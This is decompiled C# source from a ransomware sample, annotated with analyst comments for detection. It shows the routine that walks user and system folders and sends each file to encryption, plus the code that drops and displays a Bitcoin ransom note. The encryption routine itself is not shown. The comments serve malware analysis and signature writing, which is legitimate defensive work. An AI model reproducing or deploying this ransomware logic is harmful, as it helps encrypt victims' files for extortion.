Пример #1
 // Token: 0x06000192 RID: 402 RVA: 0x0000B804 File Offset: 0x00009A04
 /// <summary>
 /// Driver of the file-encryption stage in this decompiled sample: optionally walks a fixed
 /// list of user and system folders, then drops and displays the ransom note.
 /// </summary>
 /// <remarks>
 /// Analyst notes, limited to what this listing shows:
 /// the folder walk runs only when <c>%ProgramData%\trig</c> does not exist, while the note
 /// is written, shown and opened on every call. Nothing in this listing creates the
 /// <c>trig</c> file, so its writer and exact purpose cannot be confirmed here (presumably an
 /// "already ran" marker; verify against the rest of the assembly).
 /// Host artifacts visible in this method: the <c>trig</c> marker path, a
 /// <c>HowToDecrypt.txt</c> file in the common (all-users) desktop directory, and the note
 /// strings below.
 /// </remarks>
 internal static void Start()
 {
     // Gate: the directory walk is skipped when the marker file is already present.
     // The path is built from the ProgramData environment variable, not from SpecialFolder.
     if (!File.Exists(Environment.GetEnvironmentVariable("ProgramData") + "\\trig"))
     {
         // Target roots, resolved per-user and machine-wide through Environment.GetFolderPath.
         // SpecialFolder.Personal appears twice, and UserProfile typically contains several of
         // the other entries, so the same trees are likely walked more than once.
         string[] array = new string[]
         {
             Environment.GetFolderPath(Environment.SpecialFolder.Recent),
             Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),
             Environment.GetFolderPath(Environment.SpecialFolder.MyPictures),
             Environment.GetFolderPath(Environment.SpecialFolder.MyMusic),
             Environment.GetFolderPath(Environment.SpecialFolder.MyVideos),
             Environment.GetFolderPath(Environment.SpecialFolder.Personal),
             Environment.GetFolderPath(Environment.SpecialFolder.Favorites),
             Environment.GetFolderPath(Environment.SpecialFolder.CommonDocuments),
             Environment.GetFolderPath(Environment.SpecialFolder.CommonPictures),
             Environment.GetFolderPath(Environment.SpecialFolder.CommonMusic),
             Environment.GetFolderPath(Environment.SpecialFolder.CommonVideos),
             Environment.GetFolderPath(Environment.SpecialFolder.CommonDesktopDirectory),
             Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory),
             Environment.GetFolderPath(Environment.SpecialFolder.Personal),
             Environment.GetFolderPath(Environment.SpecialFolder.UserProfile),
             Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
             Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData),
             Environment.GetFolderPath(Environment.SpecialFolder.ProgramFilesX86),
             Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles)
         };
         // Each root is handed to the recursive walker; a burst of file rewrites across these
         // locations from a single process is the behaviour to look for in telemetry.
         for (int i = 0; i < array.Length; i++)
         {
             RansomwareCrypt.GetFile(array[i]);
         }
     }
     // Ransom note written as UTF-8 to the common desktop directory. This runs outside the
     // marker check above, so the note is rewritten on every invocation.
     File.WriteAllText(Environment.GetFolderPath(Environment.SpecialFolder.CommonDesktopDirectory) + "\\HowToDecrypt.txt", string.Concat(new string[]
     {
         "IMPORTANT INFORMATION!!!!\nAll your files are encrypted with Russian Paradise stealer:",
         // The version setting is passed through crypt.AESDecript here, which suggests it is
         // stored encrypted in the binary (crypt is not shown; confirm).
         crypt.AESDecript(Settings.Stealer_version),
         "\nTo Decrypt: \n - Send 0.02 BTC to: ",
         Settings.bitcoin_keshel,
         "\n- Follow All Steps"
     }), Encoding.UTF8);
     // Fixed 2000 ms pause between writing the note and showing the dialog.
     Thread.Sleep(2000);
     // Modal dialog with near-identical text. It differs from the file version in whitespace
     // ("stealer: " and "\n - Follow") and uses Settings.Stealer_version without the
     // AESDecript call, so string-based signatures should account for both variants.
     MessageBox.Show(string.Concat(new string[]
     {
         "IMPORTANT INFORMATION!!!!\nAll your files are encrypted with Russian Paradise stealer: ",
         Settings.Stealer_version,
         "\nTo Decrypt: \n - Send 0.02 BTC to: ",
         Settings.bitcoin_keshel,
         "\n - Follow All Steps"
     }));
     // Opens the dropped note via Process.Start on the .txt path (presumably in the default
     // text handler), giving a parent/child process relationship that can be logged.
     Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.CommonDesktopDirectory) + "\\HowToDecrypt.txt");
 }
Пример #2
 // Token: 0x06000191 RID: 401 RVA: 0x0000B794 File Offset: 0x00009994
 /// <summary>
 /// Recursive directory walker of the decompiled sample: passes every file under
 /// <paramref name="string_1"/> to <c>RansomwareCrypt.EncryptFiles</c>, except files whose
 /// extension contains "loki", then descends into each subdirectory.
 /// </summary>
 /// <param name="string_1">Directory path to walk (decompiler-generated parameter name).</param>
 /// <remarks>
 /// Analyst notes: <c>EncryptFiles</c> is not part of this listing, so the cipher, key handling
 /// and output naming cannot be stated from here. The "loki" check presumably skips files the
 /// sample has already processed (confirm against <c>EncryptFiles</c>).
 /// </remarks>
 public static void GetFile(string string_1)
 {
     try
     {
         // Files directly inside the current directory.
         foreach (string text in Directory.GetFiles(string_1))
         {
             // Substring test on the extension; string.Contains(string) is ordinal and
             // case-sensitive, so only lower-case "loki" is matched.
             if (!Path.GetExtension(text).Contains("loki"))
             {
                 RansomwareCrypt.EncryptFiles(text);
             }
         }
         // Depth-first recursion into every subdirectory, with no depth limit or exclusion list.
         string[] array = Directory.GetDirectories(string_1);
         for (int i = 0; i < array.Length; i++)
         {
             RansomwareCrypt.GetFile(array[i]);
         }
     }
     // Every exception is swallowed: an error raised anywhere inside the try block (for example
     // an access-denied directory) silently ends processing of this directory level, so
     // protected locations produce no visible failure and partial encryption of a tree is
     // possible.
     catch (Exception)
     {
     }
 }